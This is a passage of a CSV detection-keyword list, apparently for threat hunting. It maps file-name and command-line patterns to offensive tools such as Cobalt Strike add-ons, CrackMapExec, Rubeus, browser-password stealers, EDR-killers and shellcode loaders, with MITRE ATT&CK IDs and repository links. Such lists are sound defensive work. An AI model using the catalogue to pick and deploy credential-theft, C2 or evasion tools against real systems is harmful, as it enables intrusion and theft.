+"*\AutoSmuggle\*.cs*","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","9","2","142","21","2023-09-02T08:09:50Z","2022-03-20T19:02:06Z"
+"*\autotimeline*","offensive_tool_keyword","autotimeliner","Automagically extract forensic timeline from volatile memory dumps.","T1547 - T1057 - T1003","TA0005 - TA0008","N/A","N/A","Forensic Exploitation tools","https://github.com/andreafortuna/autotimeliner","1","1","N/A","N/A","2","119","23","2023-03-17T07:29:34Z","2018-11-12T16:13:32Z"
+"*\avetdbg.txt*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z"
+"*\avred.py*","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z"
+"*\avred.py*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z"
+"*\avredweb.py *","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","2","173","19","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z"
+"*\AzureC2Proxy\*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z"
+"*\AzureC2Relay*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","1","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z"
+"*\AzureHound.ps1*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*\BabelStrike.py*","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","0","N/A","1","1","38","13","2023-09-12T13:49:30Z","2023-01-10T07:59:00Z"
+"*\backdoored\*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z"
+"*\BackupOperatorToDA*","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","0","N/A","10","4","335","48","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z"
+"*\BadZure*","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","0","N/A","5","4","302","18","2023-07-27T15:40:41Z","2023-05-05T04:52:21Z"
+"*\basicKitten.exe*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z"
+"*\beacon.exe*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","0","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z"
+"*\BeaconChannel.cs*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z"
+"*\BeaconConnector.cs*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z"
+"*\BesoToken.cpp*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z"
+"*\BesoToken.exe*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z"
+"*\BesoToken.vcxproj*","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","10","1","91","11","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z"
+"*\bh_owned.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*\bin\cme.exe*","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*\bin\shepard\*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*\BITB-main*","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","0","N/A","10","10","2646","464","2023-07-11T04:57:46Z","2022-03-15T16:51:39Z"
+"*\BitTorrent.exe*","greyware_tool_keyword","bittorent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Collection - Data Exfiltration","https[://]www[.]bittorrent.com/fr/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*\Blackout.cpp*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z"
+"*\Blackout.exe*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z"
+"*\Blackout.sln*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z"
+"*\Blackout.sys*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z"
+"*\Blackout.sys*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z"
+"*\Blackout.vcxproj*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z"
+"*\blindeventlog.exe*","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","3","268","38","2023-08-03T22:37:44Z","2023-07-24T13:59:16Z"
+"*\BloodHound.exe*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z"
+"*\BloodHoundGui\*.exe*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z"
+"*\BloodHound-win32-X64*","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","0","N/A","10","10","8802","1624","2023-10-03T06:49:04Z","2016-04-17T18:36:14Z"
+"*\bootkit-rs*","offensive_tool_keyword","bootkit-rs","Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus)","T1542.004 - T1067.002 - T1012 - T1053.005 - T1057","TA0002 - TA0040 - TA0003 - TA0001","N/A","N/A","Defense Evasion","https://github.com/memN0ps/bootkit-rs","1","0","N/A","N/A","5","449","54","2023-09-12T07:23:15Z","2023-04-11T03:53:15Z"
+"*\brc.zip*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
+"*\BrowserEnum.log*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*\Bruteforcer.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z"
+"*\bypassuac.txt*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","2","183","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z"
+"*\C2concealer*","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","N/A","10","10","850","162","2021-09-26T16:37:06Z","2020-03-23T14:13:16Z"
+"*\certipy.pfx*","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","6","567","65","2023-07-25T15:22:06Z","2023-01-31T15:37:12Z"
+"*\charlotte.cpp*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z"
+"*\charlotte.py*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","931","235","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z"
+"*\chimera.py*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z"
+"*\Chimera-main\*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z"
+"*\chisel.exe*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z"
+"*\chisel-master*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z"
+"*\Chrome_pass.db*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z"
+"*\chromium_based_browsers.py*","offensive_tool_keyword","Browser-password-stealer","This python program gets all the saved passwords + credit cards and bookmarks from chromium based browsers supports chromium 80 and above!","T1003.002 - T1056.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/henry-richard7/Browser-password-stealer","1","0","N/A","10","4","304","51","2023-09-03T10:32:39Z","2020-09-15T09:23:56Z"
+"*\CIMplant.exe*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z"
+"*\CloakNDaggerC2*","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","0","N/A","10","10","4","2","2023-10-04T12:32:38Z","2023-04-28T01:58:18Z"
+"*\cloud_enum.py*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","0","N/A","6","10","1242","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z"
+"*\cme.exe* -d * -u * -H *","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*\cme.exe* -d * -u * -p *","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*\cme.exe* --shares*","offensive_tool_keyword","crackmapexec","windows default copiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*\codeloader.exe*","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","0","N/A","10","10","555","105","2023-08-26T12:48:08Z","2021-01-19T15:57:01Z"
+"*\Coercer.py*","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","1361","154","2023-10-04T05:59:13Z","2022-06-30T16:52:33Z"
+"*\combine.exe*","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","10","2","101","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z"
+"*\combine_gui.exe*","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","0","N/A","10","2","101","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z"
+"*\COM-Hunter.csproj*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z"
+"*\COM-Hunter.exe*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z"
+"*\COM-Hunter.sln*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z"
+"*\common_pass.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z"
+"*\ComunicationC2.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z"
+"*\Cooolis-ms-Loader\*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 